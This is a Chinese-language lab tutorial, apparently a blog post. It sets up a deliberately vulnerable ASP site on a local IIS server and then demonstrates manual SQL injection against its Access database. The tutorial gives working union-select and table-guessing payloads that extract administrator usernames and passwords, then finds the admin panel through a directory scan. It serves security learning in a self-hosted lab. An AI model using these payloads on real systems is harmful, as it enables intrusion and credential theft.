环境搭建教程
1.提取文件 文件名为1111.zip
百度网盘:
链接: https://pan.baidu.com/s/1EHBweR9D0xVbw5qgcYrcww 提取码: zxin
2.解压1111文件,将1111文件中的内容拖到inetpub/wwwroot目录下
3.在IIS中绑定自己的IP
4.在浏览器中输入自己刚才输入的IP地址+index.asp
至此,环境搭建完成。
接下来进行Access手工注入
Access手工注入
1.随便点击该网站,找到可以进行的攻击点,这里找的是新闻中心一栏
2.这里在id=14后面进行注入
?id=14 and 1=1 //页面正常
?id=14 and 1=2 //页面错误
所以是数字型注入
3.确认列数
?id=14 order by 7 //页面正常
?id=14 order by 8 //页面错误
所以一共与7列
4.Access数据库中结构和MySQL的数据库结构不一样,Access中么有库,是直接从表开始,然后是字段 ,但是表也是不固定的,所以这里要先对表明进行猜测
而这些表明=名也不是无厘头的猜测,通常都是一些固定的字段;如:admin、admins、admin_user、administrator等大小写混合的字段
这里也可以使用语句进行测试
测试语句:
?id=14 and exists(select * from administrator)
得到administrator表名
5.查询回显点
因为Access没有库名,所以进行联合查询的时候要加上‘from表名’
查询语句:
?id=14 union select 1,2,3,4,5,6,7 from administrator
得到回显点有四处,分别是2,3,5,7
6.接下来进行表名中的字段查询
同样的,字段也是需要进行猜测来得到,而依据建表经验,在什么表下,可能会有与其相关联的字段名;如:administrator下可能就会有username,password等字段,他可能会以不同的形式书写,所以猜测也要有计划性、目的性的猜测。
查询语句:
?id=14 union select 1,user_name,password,4,5,6,7 from administrator
这里得到它的字段名为user_name和password
从而得到了对应的数据。
7.密码是有d加密的,所以需要自行解码,得到密码
8.得到用户名和密码后需要进入到该网站的后台,我们对该网站进行目录扫描
9.得到该目录后,就是该网站的后台
输入用户名密码就可以进入后台了